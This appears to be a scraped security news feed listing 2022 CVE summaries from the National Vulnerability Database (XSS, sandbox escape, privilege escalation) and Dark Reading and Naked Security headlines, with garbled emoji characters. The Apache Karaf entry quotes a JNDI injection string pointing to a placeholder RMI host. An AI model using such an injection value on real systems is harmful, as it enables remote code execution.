βΌ CVE-2022-25929 βΌ
π Read
via "National Vulnerability Database".
The package smoothie from 1.31.0 and before 1.36.1 are vulnerable to Cross-site Scripting (XSS) due to improper user input sanitization in strokeStyle and tooltipLabel properties. Exploiting this vulnerability is possible when the user can control these properties.π Read
via "National Vulnerability Database".
βΌ CVE-2022-38546 βΌ
π Read
via "National Vulnerability Database".
A DNS misconfiguration was found in Zyxel NBG7510 firmware versions prior to V1.00(ABZY.3)C0, which could allow an unauthenticated attacker to access the DNS server when the device is switched to the AP mode.π Read
via "National Vulnerability Database".
βΌ CVE-2022-25893 βΌ
π Read
via "National Vulnerability Database".
The package vm2 before 3.9.10 are vulnerable to Arbitrary Code Execution due to the usage of prototype lookup for the WeakMap.prototype.set method. Exploiting this vulnerability leads to access to a host object and a sandbox compromise.π Read
via "National Vulnerability Database".
βΌ CVE-2022-25895 βΌ
π Read
via "National Vulnerability Database".
All versions of package lite-dev-server are vulnerable to Directory Traversal due to missing input sanitization and sandboxes being employed to the req.url user input that is passed to the server code.π Read
via "National Vulnerability Database".
βΌ CVE-2022-46282 βΌ
π Read
via "National Vulnerability Database".
Use after free vulnerability in CX-Drive V3.00 and earlier allows a local attacker to execute arbitrary code by having a user to open a specially crafted file,π Read
via "National Vulnerability Database".
βΌ CVE-2022-46662 βΌ
π Read
via "National Vulnerability Database".
Roxio Creator LJB starts another program with an unquoted file path. Since a registered Windows service path contains spaces and are unquoted, if a malicious executable is placed on a certain path, the executable may be executed with the privilege of the Windows service. The affected product and versions are as follows: Roxio Creator LJB version number 12.2 build number 106B62B, version number 12.2 build number 106B63A, version number 12.2 build number 106B69A, version number 12.2 build number 106B71A, and version number 12.2 build number 106B74A)π Read
via "National Vulnerability Database".
βΌ CVE-2022-44449 βΌ
π Read
via "National Vulnerability Database".
Stored cross-site scripting vulnerability in Zenphoto versions prior to 1.6 allows remote a remote authenticated attacker with an administrative privilege to inject an arbitrary script.π Read
via "National Vulnerability Database".
βΌ CVE-2022-47635 βΌ
π Read
via "National Vulnerability Database".
Wildix WMS 6 before 6.02.20221216, WMS 5 before 5.04.20221214, and WMS4 before 4.04.45396.23 allows Server-side request forgery (SSRF) via ZohoClient.php.π Read
via "National Vulnerability Database".
βΌ CVE-2022-43543 βΌ
π Read
via "National Vulnerability Database".
KDDI +Message App, NTT DOCOMO +Message App, and SoftBank +Message App contain a vulnerability caused by improper handling of Unicode control characters. +Message App displays text unprocessed, even when control characters are contained, and the text is shown based on Unicode control character's specifications. Therefore, a crafted text may display misleading web links. As a result, a spoofed URL may be displayed and phishing attacks may be conducted. Affected products and versions are as follows: KDDI +Message App for Android prior to version 3.9.2 and +Message App for iOS prior to version 3.9.4, NTT DOCOMO +Message App for Android prior to version 54.49.0500 and +Message App for iOS prior to version 3.9.4, and SoftBank +Message App for Android prior to version 12.9.5 and +Message App for iOS prior to version 3.9.4π Read
via "National Vulnerability Database".
βΌ CVE-2022-46330 βΌ
π Read
via "National Vulnerability Database".
Squirrel.Windows is both a toolset and a library that provides installation and update functionality for Windows desktop applications. Installers generated by Squirrel.Windows 2.0.1 and earlier contain an issue with the DLL search path, which may lead to insecurely loading Dynamic Link Libraries. As a result, arbitrary code may be executed with the privilege of the user invoking the installer.π Read
via "National Vulnerability Database".
βΌ CVE-2022-38060 βΌ
π Read
via "National Vulnerability Database".
A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.π Read
via "National Vulnerability Database".
βΌ CVE-2022-38065 βΌ
π Read
via "National Vulnerability Database".
A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.π Read
via "National Vulnerability Database".
π΄ How to Run Kubernetes More Securely π΄
π Read
via "Dark Reading".
The open source container tool is quite popular among developers β and threat actors. Here are a few ways DevOps teams can take control.π Read
via "Dark Reading".
Dark Reading
How to Run Kubernetes More Securely
The open source container tool is quite popular among developers β and threat actors. Here are a few ways DevOps teams can take control.
π΄ Godfather Banking Trojan Masquerades as Legitimate Google Play App π΄
π Read
via "Dark Reading".
The malware has resurfaced, using an icon and name similar to the legitimate Google Play app MYT Music, a popular app with more than 10 million downloads.π Read
via "Dark Reading".
Dark Reading
Godfather Banking Trojan Masquerades as Legitimate Google Play App
The malware has resurfaced, using an icon and name similar to the legitimate Google Play app MYT Music, a popular app with more than 10 million downloads.
π΄ Understanding the 3 Classes of Kubernetes Risk π΄
π Read
via "Dark Reading".
The first step toward securing Kubernetes environments is understanding the risks they pose and identifying the ways in which those risks can be mitigated.π Read
via "Dark Reading".
Dark Reading
Understanding the 3 Classes of Kubernetes Risk
The first step toward securing Kubernetes environments is understanding the risks they pose and identifying the ways in which those risks can be mitigated.
π1
π΄ Kaspersky Research Finds Reverse Engineering Is the Most On-Demand Skill Among InfoSec Specialists π΄
π Read
via "Dark Reading".
π Read
via "Dark Reading".
Dark Reading
Kaspersky Research Finds Reverse Engineering Is the Most On-Demand Skill Among InfoSec Specialists
Woburn, MA β December 21, 2022 β According toresults shown by the latest statistics from participantspassing Kaspersky Expert Training courses, the most desired skill IT security professionals wanted to advance in 2022 is the ability to reverse engineer malware.
βΌ CVE-2022-40145 βΌ
π Read
via "National Vulnerability Database".
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8π Read
via "National Vulnerability Database".
π1
β Microsoft dishes the dirt on Appleβs βAchilles heelβ shortly after fixing similar Windows bug β
π Read
via "Naked Security".
It happens to the best of us: Microsoft highlights a security bypass bug on Macs that is curiously similar to a recent Windows 0-day.π Read
via "Naked Security".
Sophos News
Naked Security β Sophos News
π΄ Trend Micro Joins Googleβs App Defense Alliance π΄
π Read
via "Dark Reading".
Trend Micro will be joining Google's App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the Google Play store.π Read
via "Dark Reading".
Dark Reading
Trend Micro Joins Googleβs App Defense Alliance
Trend Micro will be joining Google's App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the Google Play store.
β βSuspicious loginβ scammers up their game β take care at Christmas β
π Read
via "Naked Security".
A picture is worth 1024 words - we clicked through so you don't have to.π Read
via "Naked Security".
Naked Security
βSuspicious loginβ scammers up their game β take care at Christmas
A picture is worth 1024 words β we clicked through so you donβt have to.
π΄ Name That Toon: Kiss and Tell π΄
π Read
via "Dark Reading".
Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 Amazon gift card.π Read
via "Dark Reading".
Dark Reading
Name That Toon: Kiss and Tell
Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 Amazon gift card.